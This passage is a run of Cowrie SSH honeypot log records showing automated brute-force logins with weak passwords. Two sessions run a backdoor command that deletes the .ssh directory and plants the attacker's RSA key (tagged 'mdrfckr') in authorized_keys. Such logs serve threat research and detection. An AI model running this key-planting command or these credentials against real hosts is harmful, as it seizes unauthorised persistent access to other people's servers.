512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:08:35.578319Z","src_ip":"103.59.95.12","session":"7d9ae8366e91"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:08:36.723157Z","src_ip":"103.59.95.12","session":"7d9ae8366e91"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:08:38.452674Z","src_ip":"103.59.95.12","session":"7d9ae8366e91"}
{"eventid":"cowrie.session.connect","src_ip":"103.59.95.12","src_port":36506,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ec0fb7c16f0","protocol":"ssh","message":"New connection: 103.59.95.12:36506 (1.2.3.4:22) [session: 7ec0fb7c16f0]","sensor":"my-vps","timestamp":"2025-09-09T04:08:38.715588Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:08:38.716242Z","src_ip":"103.59.95.12","session":"7ec0fb7c16f0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:08:38.979895Z","src_ip":"103.59.95.12","session":"7ec0fb7c16f0"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:08:40.371664Z","src_ip":"103.59.95.12","session":"7ec0fb7c16f0"}
{"eventid":"cowrie.session.closed","duration":"9.3","message":"Connection lost after 9.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:08:40.629631Z","src_ip":"103.59.95.12","session":"59de1e0d8bc4"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:08:40.636291Z","src_ip":"103.59.95.12","session":"7ec0fb7c16f0"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":38748,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb292c2c5f6d","protocol":"ssh","message":"New connection: 152.32.190.168:38748 (1.2.3.4:22) [session: fb292c2c5f6d]","sensor":"my-vps","timestamp":"2025-09-09T04:08:52.070382Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:08:52.071220Z","src_ip":"152.32.190.168","session":"fb292c2c5f6d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:08:52.273514Z","src_ip":"152.32.190.168","session":"fb292c2c5f6d"}
{"eventid":"cowrie.login.success","username":"root","password":"Wz123456","message":"login attempt [root/Wz123456] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:08:53.124069Z","src_ip":"152.32.190.168","session":"fb292c2c5f6d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:08:53.575281Z","src_ip":"152.32.190.168","session":"fb292c2c5f6d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:08:53.576042Z","src_ip":"152.32.190.168","session":"fb292c2c5f6d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:08:53.576807Z","src_ip":"152.32.190.168","session":"fb292c2c5f6d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:08:53.780923Z","src_ip":"152.32.190.168","session":"fb292c2c5f6d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:08:54.243506Z","src_ip":"152.32.190.168","session":"fb292c2c5f6d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:08:54.244190Z","src_ip":"152.32.190.168","session":"fb292c2c5f6d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:08:54.448255Z","src_ip":"152.32.190.168","session":"fb292c2c5f6d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:08:54.449214Z","src_ip":"152.32.190.168","session":"fb292c2c5f6d"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":38754,"dst_ip":"1.2.3.4","dst_port":22,"session":"40bf72802942","protocol":"ssh","message":"New connection: 152.32.190.168:38754 (1.2.3.4:22) [session: 40bf72802942]","sensor":"my-vps","timestamp":"2025-09-09T04:08:54.644503Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:08:54.645137Z","src_ip":"152.32.190.168","session":"40bf72802942"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:08:54.845710Z","src_ip":"152.32.190.168","session":"40bf72802942"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:08:55.688356Z","src_ip":"152.32.190.168","session":"40bf72802942"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":51212,"dst_ip":"1.2.3.4","dst_port":22,"session":"00816011a7e4","protocol":"ssh","message":"New connection: 192.210.135.20:51212 (1.2.3.4:22) [session: 00816011a7e4]","sensor":"my-vps","timestamp":"2025-09-09T04:08:56.557166Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:08:56.558013Z","src_ip":"192.210.135.20","session":"00816011a7e4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:08:56.666829Z","src_ip":"192.210.135.20","session":"00816011a7e4"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:08:56.890850Z","src_ip":"152.32.190.168","session":"40bf72802942"}
{"eventid":"cowrie.login.failed","username":"webapp","password":"Password123","message":"login attempt [webapp/Password123] failed","sensor":"my-vps","timestamp":"2025-09-09T04:08:57.142200Z","src_ip":"192.210.135.20","session":"00816011a7e4"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":38758,"dst_ip":"1.2.3.4","dst_port":22,"session":"827004ebed99","protocol":"ssh","message":"New connection: 152.32.190.168:38758 (1.2.3.4:22) [session: 827004ebed99]","sensor":"my-vps","timestamp":"2025-09-09T04:08:57.200408Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:08:57.201166Z","src_ip":"152.32.190.168","session":"827004ebed99"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:08:57.454785Z","src_ip":"152.32.190.168","session":"827004ebed99"}
{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":43486,"dst_ip":"1.2.3.4","dst_port":22,"session":"99b884ba6a97","protocol":"ssh","message":"New connection: 211.22.25.164:43486 (1.2.3.4:22) [session: 99b884ba6a97]","sensor":"my-vps","timestamp":"2025-09-09T04:08:57.538576Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:08:57.540596Z","src_ip":"211.22.25.164","session":"99b884ba6a97"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:08:57.780119Z","src_ip":"211.22.25.164","session":"99b884ba6a97"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:08:58.254096Z","src_ip":"192.210.135.20","session":"00816011a7e4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:08:58.509639Z","src_ip":"152.32.190.168","session":"827004ebed99"}
{"eventid":"cowrie.session.closed","duration":"6.6","message":"Connection lost after 6.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:08:58.712846Z","src_ip":"152.32.190.168","session":"fb292c2c5f6d"}
{"eventid":"cowrie.login.failed","username":"db2inst1","password":"1","message":"login attempt [db2inst1/1] failed","sensor":"my-vps","timestamp":"2025-09-09T04:08:58.739978Z","src_ip":"211.22.25.164","session":"99b884ba6a97"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:08:58.764301Z","src_ip":"152.32.190.168","session":"827004ebed99"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:08:59.982036Z","src_ip":"211.22.25.164","session":"99b884ba6a97"}
{"eventid":"cowrie.session.connect","src_ip":"212.16.68.6","src_port":57146,"dst_ip":"1.2.3.4","dst_port":22,"session":"f46cf705f85d","protocol":"ssh","message":"New connection: 212.16.68.6:57146 (1.2.3.4:22) [session: f46cf705f85d]","sensor":"my-vps","timestamp":"2025-09-09T04:09:02.716339Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:09:02.717386Z","src_ip":"212.16.68.6","session":"f46cf705f85d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:09:02.795580Z","src_ip":"212.16.68.6","session":"f46cf705f85d"}
{"eventid":"cowrie.login.success","username":"root","password":"hetzner#123","message":"login attempt [root/hetzner#123] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:09:03.153478Z","src_ip":"212.16.68.6","session":"f46cf705f85d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:09:03.335889Z","src_ip":"212.16.68.6","session":"f46cf705f85d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:09:03.336659Z","src_ip":"212.16.68.6","session":"f46cf705f85d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:09:03.337960Z","src_ip":"212.16.68.6","session":"f46cf705f85d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:09:03.418509Z","src_ip":"212.16.68.6","session":"f46cf705f85d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:09:03.676479Z","src_ip":"212.16.68.6","session":"f46cf705f85d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:09:03.677187Z","src_ip":"212.16.68.6","session":"f46cf705f85d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:09:03.757619Z","src_ip":"212.16.68.6","session":"f46cf705f85d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:09:03.758845Z","src_ip":"212.16.68.6","session":"f46cf705f85d"}
